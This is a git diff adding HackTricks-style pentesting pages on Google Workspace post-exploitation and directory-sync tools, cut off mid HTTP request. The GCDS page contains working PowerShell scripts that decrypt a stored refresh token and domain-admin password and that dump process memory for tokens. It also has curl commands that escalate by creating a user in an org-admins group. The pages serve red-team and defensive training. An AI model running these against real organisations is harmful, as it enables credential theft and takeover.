diff --git a/pentesting-cloud/workspace-security/gws-post-exploitation.md b/pentesting-cloud/workspace-security/gws-post-exploitation.md
new file mode 100644
index 0000000000..a1a3cf4a1c
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-post-exploitation.md
@@ -0,0 +1,100 @@
+# GWS - Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Google Groups Privesc
+
+By default in workspace a **group** can be **freely accessed** by any member of the organization.\
+Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.
+
+You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
+
+### Access Groups Mail info
+
+If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**.
+
+## GCP <--> GWS Pivoting
+
+{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %}
+[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/)
+{% endcontent-ref %}
+
+## Takeout - Download Everything Google Knows about an account
+
+If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
+
+## Vault - Download all the Workspace data of users
+
+If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.
+
+## Contacts download
+
+From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user.
+
+## Cloudsearch
+
+In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **quickly find sensitive information**.
+
+## Google Chat
+
+In [**https://mail.google.com/chat**](https://mail.google.com/chat) you can access a Google **Chat**, and you might find sensitive information in the conversations (if any).
+
+## Google Drive Mining
+
+When **sharing** a document you can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
+
+When sharing a document, in the advance setting you can also **allow people to search** for this file (by **default** this is **disabled**). However, it's important to note that once users views a document, it's searchable by them.
+
+For sake of simplicity, most of the people will generate and share a link instead of adding the people that can access the document one by one.
+
+Some proposed ways to find all the documents:
+
+* Search in internal chat, forums...
+* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
+
+## **Keep Notes**
+
+In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
+
+### Modify App Scripts
+
+In [**https://script.google.com/**](https://script.google.com/) you can find the APP Scripts of the user.
+
+## **Administrate Workspace**
+
+In [**https://admin.google.com**/](https://admin.google.com), you might be able to modify the Workspace settings of the whole organization if you have enough permissions.
+
+You can also find emails by searching through all the user's invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
+
+## References
+
+* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md
new file mode 100644
index 0000000000..30bbf4d6a6
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md
@@ -0,0 +1,87 @@
+# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## GCPW - Google Credential Provider for Windows
+
+This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**.
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
+{% endhint %}
+
+Find more information about this in:
+
+{% content-ref url="gcpw-google-credential-provider-for-windows.md" %}
+[gcpw-google-credential-provider-for-windows.md](gcpw-google-credential-provider-for-windows.md)
+{% endcontent-ref %}
+
+## GCSD - Google Cloud Directory Sync
+
+This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
+
+It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
+{% endhint %}
+
+Find more information about this in:
+
+{% content-ref url="gcds-google-cloud-directory-sync.md" %}
+[gcds-google-cloud-directory-sync.md](gcds-google-cloud-directory-sync.md)
+{% endcontent-ref %}
+
+## GPS - Google Password Sync
+
+This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
+
+It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**.
+{% endhint %}
+
+Find more information about this in:
+
+{% content-ref url="gps-google-password-sync.md" %}
+[gps-google-password-sync.md](gps-google-password-sync.md)
+{% endcontent-ref %}
+
+## Admin Directory Sync
+
+The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+Find more information about this in:
+
+{% content-ref url="gws-admin-directory-sync.md" %}
+[gws-admin-directory-sync.md](gws-admin-directory-sync.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
new file mode 100644
index 0000000000..a2f5e0f0ef
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
@@ -0,0 +1,371 @@
+# GCDS - Google Cloud Directory Sync
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
+
+It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+
+{% hint style="info" %}
+To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`**
+{% endhint %}
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
+{% endhint %}
+
+Also note that GCDS won't synchronize passwords from AD to Workspace. If something it'll just generate random passwords for newly created users in Workspace as you can see in the following image:
+
+<figure><img src="../../../.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg" alt="" width="515"><figcaption></figcaption></figure>
+
+### GCDS - Disk Tokens & AD Credentials
+
+The binary `config-manager.exe` (the main GCDS binary with GUI) will store the configured Active Directory credentials, the refresh token and the access by default in a **xml file** in the folder **`C:\Program Files\Google Cloud Directory Sync`** in a file called **`Untitled-1.xml`** by default. Although it could also be saved in the `Documents` of the user or in **any other folder**.
+
+Moreover, the registry **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** inside the key **`open.recent`** contains the paths to all the recently opened configuration files (xmls). So it's possible to **check it to find them**.
+
+The most interesting information inside the file would be:
+
+```xml
+[...]
+<loginMethod>OAUTH2</loginMethod>
+<oAuth2RefreshToken>rKvvNQxi74JZGI74u68aC6o+3Nu1ZgVUYdD1GyoWyiHHxtWx+lbx3Nk8dU27fts5lCJKH/Gp1q8S6kEM2AvjQZN16MkGTU+L2Yd0kZsIJWeO0K0RdVaK2D9Saqchk347kDgGsQulJnuxU+Puo46+aA==</oAuth2RefreshToken>
+<oAuth2Scopes>
+<scope>https://www.google.com/m8/feeds/</scope>
+<scope>https://www.googleapis.com/auth/admin.directory.group</scope>
+<scope>https://www.googleapis.com/auth/admin.directory.orgunit</scope>
+<scope>https://www.googleapis.com/auth/admin.directory.resource.calendar</scope>
+<scope>https://www.googleapis.com/auth/admin.directory.user</scope>
+<scope>https://www.googleapis.com/auth/admin.directory.userschema</scope>
+<scope>https://www.googleapis.com/auth/apps.groups.settings</scope>
+<scope>https://www.googleapis.com/auth/apps.licensing</scope>
+<scope>https://www.googleapis.com/auth/plus.me</scope>
+</oAuth2Scopes>
+[...]
+<hostname>192.168.10.23</hostname>
+<port>389</port>
+<basedn>dc=hacktricks,dc=local</basedn>
+<authType>SIMPLE</authType>
+<authUser>DOMAIN\domain-admin</authUser>
+<authCredentialsEncrypted>XMmsPMGxz7nkpChpC7h2ag==</authCredentialsEncrypted>
+[...]
+```
+
+Note how the **refresh** **token** and the **password** of the user are **encrypted** using **AES CBC** with a randomly generated key and IV stored in **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (wherever the **`prefs`** Java library store the preferences) in the string keys **`/Encryption/Policy/V2.iv`** and **`/Encryption/Policy/V2.key`** stored in base64.
+
+<details>
+
+<summary>Powershell script to decrypt the refresh token and the password</summary>
+
+```powershell
+# Paths and key names
+$xmlConfigPath = "C:\Users\c\Documents\conf.xml"
+$regPath = "SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util"
+$ivKeyName = "/Encryption/Policy/V2.iv"
+$keyKeyName = "/Encryption/Policy/V2.key"
+
+# Open the registry key
+try {
+    $regKey = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($regPath)
+    if (-not $regKey) {
+        Throw "Registry key not found: HKCU\$regPath"
+    }
+}
+catch {
+    Write-Error "Failed to open registry key: $_"
+    exit
+}
+
+# Get Base64-encoded IV and Key from the registry
+try {
+    $ivBase64 = $regKey.GetValue($ivKeyName)
+    $ivBase64 = $ivBase64 -replace '/', ''
+    $ivBase64 = $ivBase64 -replace '\\', '/'
+    if (-not $ivBase64) {
+        Throw "IV not found in registry"
+    }
+    $keyBase64 = $regKey.GetValue($keyKeyName)
+    $keyBase64 = $keyBase64 -replace '/', ''
+    $keyBase64 = $keyBase64 -replace '\\', '/'
+    if (-not $keyBase64) {
+        Throw "Key not found in registry"
+    }
+}
+catch {
+    Write-Error "Failed to read registry values: $_"
+    exit
+}
+$regKey.Close()
+
+
+# Decode Base64 IV and Key
+$ivBytes = [Convert]::FromBase64String($ivBase64)
+$keyBytes = [Convert]::FromBase64String($keyBase64)
+
+# Read XML content
+$xmlContent = Get-Content -Path $xmlConfigPath -Raw
+
+# Extract Base64-encoded encrypted values using regex
+$refreshTokenMatch = [regex]::Match($xmlContent, "<oAuth2RefreshToken>(.*?)</oAuth2RefreshToken>")
+$refreshTokenBase64 = $refreshTokenMatch.Groups[1].Value
+
+$encryptedPasswordMatch = [regex]::Match($xmlContent, "<authCredentialsEncrypted>(.*?)</authCredentialsEncrypted>")
+$encryptedPasswordBase64 = $encryptedPasswordMatch.Groups[1].Value
+
+# Decode encrypted values from Base64
+$refreshTokenEncryptedBytes = [Convert]::FromBase64String($refreshTokenBase64)
+$encryptedPasswordBytes = [Convert]::FromBase64String($encryptedPasswordBase64)
+
+# Function to decrypt data using AES CBC
+Function Decrypt-Data($cipherBytes, $keyBytes, $ivBytes) {
+    $aes = [System.Security.Cryptography.Aes]::Create()
+    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
+    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
+    $aes.KeySize = 256
+    $aes.BlockSize = 128
+    $aes.Key = $keyBytes
+    $aes.IV = $ivBytes
+
+    $decryptor = $aes.CreateDecryptor()
+    $memoryStream = New-Object System.IO.MemoryStream
+    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
+    $cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
+    $cryptoStream.FlushFinalBlock()
+    $plaintextBytes = $memoryStream.ToArray()
+
+    $cryptoStream.Close()
+    $memoryStream.Close()
+
+    return $plaintextBytes
+}
+
+# Decrypt the values
+$refreshTokenBytes = Decrypt-Data -cipherBytes $refreshTokenEncryptedBytes -keyBytes $keyBytes -ivBytes $ivBytes
+$refreshToken = [System.Text.Encoding]::UTF8.GetString($refreshTokenBytes)
+
+$decryptedPasswordBytes = Decrypt-Data -cipherBytes $encryptedPasswordBytes -keyBytes $keyBytes -ivBytes $ivBytes
+$decryptedPassword = [System.Text.Encoding]::UTF8.GetString($decryptedPasswordBytes)
+
+# Output the decrypted values
+Write-Host "Decrypted Refresh Token: $refreshToken"
+Write-Host "Decrypted Password: $decryptedPassword"
+```
+
+</details>
+
+{% hint style="info" %}
+Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys).
+{% endhint %}
+
+Instead of using the powershell script, it's also possible to use the binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** with the param `-exportKeys` and get the **Key** and **IV** from the registry in hex and then just use some cyberchef with AES/CBC and that key and IV to decrypt the info.
+
+### GCDS - Dumping tokens from memory
+
+Just like with GCPW, it's possible to dump the memory of the process of the `config-manager.exe` process (it's the name of the GCDS main binary with GUI) and you will be able to find refresh and access tokens (if they have been generated already).\
+I guess you could also find the AD configured credentials.
+
+<details>
+
+<summary>Dump config-manager.exe processes and search tokens</summary>
+
+```powershell
+# Define paths for Procdump and Strings utilities   
+$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"   
+$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"   
+$dumpFolder = "C:\Users\Public\dumps"   
+ 
+# Regular expressions for tokens 
+$tokenRegexes = @( 
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
+    "1//[a-zA-Z0-9_\.\-]{50,}" 
+)
+ 
+# Create a directory for the dumps if it doesn't exist   
+if (!(Test-Path $dumpFolder)) {   
+    New-Item -Path $dumpFolder -ItemType Directory   
+}   
+ 
+# Get all Chrome process IDs   
+$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id   
+ 
+# Dump each Chrome process   
+foreach ($processId in $chromeProcesses) {   
+    Write-Output "Dumping process with PID: $processId"   
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
+}   
+ 
+# Extract strings and search for tokens in each dump   
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
+    $dumpFile = $_.FullName   
+    $baseName = $_.BaseName 
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
+ 
+    Write-Output "Extracting strings from $dumpFile"   
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
+    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
+ 
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
+ 
+    foreach ($file in $outputFiles) { 
+        foreach ($regex in $tokenRegexes) { 
+ 
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
+ 
+            $uniqueMatches = @{} 
+ 
+            foreach ($matchInfo in $matches) { 
+                foreach ($match in $matchInfo.Matches) { 
+                    $matchValue = $match.Value 
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
+                        $uniqueMatches[$matchValue] = @{ 
+                            LineNumber = $matchInfo.LineNumber 
+                            LineText   = $matchInfo.Line.Trim() 
+                            FilePath   = $matchInfo.Path 
+                        } 
+                    } 
+                } 
+            } 
+ 
+            foreach ($matchValue in $uniqueMatches.Keys) { 
+                $info = $uniqueMatches[$matchValue] 
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
+            } 
+        } 
+ 
+        Write-Output "" 
+    } 
+} 
+ 
+Remove-Item -Path $dumpFolder -Recurse -Force
+```
+
+</details>
+
+### GCDS - Generating access tokens from refresh tokens
+
+Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
+
+```bash
+curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
+     --data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
+     https://www.googleapis.com/oauth2/v4/token
+```
+
+### GCDS - Scopes
+
+{% hint style="info" %}
+Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+
+Also, the refresh token is not valid in every application.
+{% endhint %}
+
+By default GCSD won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
+
+<details>
+
+<summary>Bash script to brute-force scopes</summary>
+
+```bash
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+    echo -ne "Testing $scope           \r"
+    if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
+     --data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03PR0VQOSCjS1CgYIARAAGAMSNwF-L9Ir5b_vOaCmnXzla0nL7dX7TJJwFcvrfgDPWI-j19Z4luLpYfLyv7miQyvgyXjGEXt-t0A" \
+     --data "scope=$scope" \
+     https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
+        echo ""
+        echo $scope
+        echo $scope >> /tmp/valid_scopes.txt
+    fi
+done
+
+echo ""
+echo ""
+echo "Valid scopes:"
+cat /tmp/valid_scopes.txt
+rm /tmp/valid_scopes.txt
+```
+
+</details>
+
+And this is the output I got at the time of the writing:
+
+```
+https://www.googleapis.com/auth/admin.directory.group
+https://www.googleapis.com/auth/admin.directory.orgunit
+https://www.googleapis.com/auth/admin.directory.resource.calendar
+https://www.googleapis.com/auth/admin.directory.user
+https://www.googleapis.com/auth/admin.directory.userschema
+https://www.googleapis.com/auth/apps.groups.settings
+https://www.googleapis.com/auth/apps.licensing
+https://www.googleapis.com/auth/contacts
+```
+
+#### Create a user and add it into the group `gcp-organization-admins` to try to escalate in GCP
+
+```bash
+# Create new user
+curl -X POST \
+  'https://admin.googleapis.com/admin/directory/v1/users' \
+  -H 'Authorization: Bearer <ACCESS_TOKEN>' \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "primaryEmail": "deleteme@domain.com",
+    "name": {
+      "givenName": "Delete",
+      "familyName": "Me"
+    },
+    "password": "P4ssw0rdStr0ng!",
+    "changePasswordAtNextLogin": false
+  }'
+
+# Add to group
+curl -X POST \
+  'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
+  -H 'Authorization: Bearer <ACCESS_TOKEN>' \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "email": "deleteme@domain.com",
+    "role": "OWNER"
+  }'
+
+# You could also change the password of a user for example
+```
+
+{% hint style="danger" %}
+It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
new file mode 100644
index 0000000000..5e62c0b1ea
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
@@ -0,0 +1,978 @@
+# GCPW - Google Credential Provider for Windows
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store tokens to access Google Workspace in some places in the PC.
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
+{% endhint %}
+
+### GCPW - MitM
+
+When a user access a Windows PC synchronized with Google Workspace via GCPW it will need to complete a common login form. This login form will return an OAuth code that the PC will exchange for the refresh token in a request like:
+
+{% code overflow="wrap" %}
+```http
+POST /oauth2/v4/token HTTP/2
+Host: www.googleapis.com
+Content-Length: 311
+Content-Type: application/x-www-form-urlencoded
+[...headers...]
+
+scope=https://www.google.com/accounts/OAuthLogin
+&grant_type=authorization_code
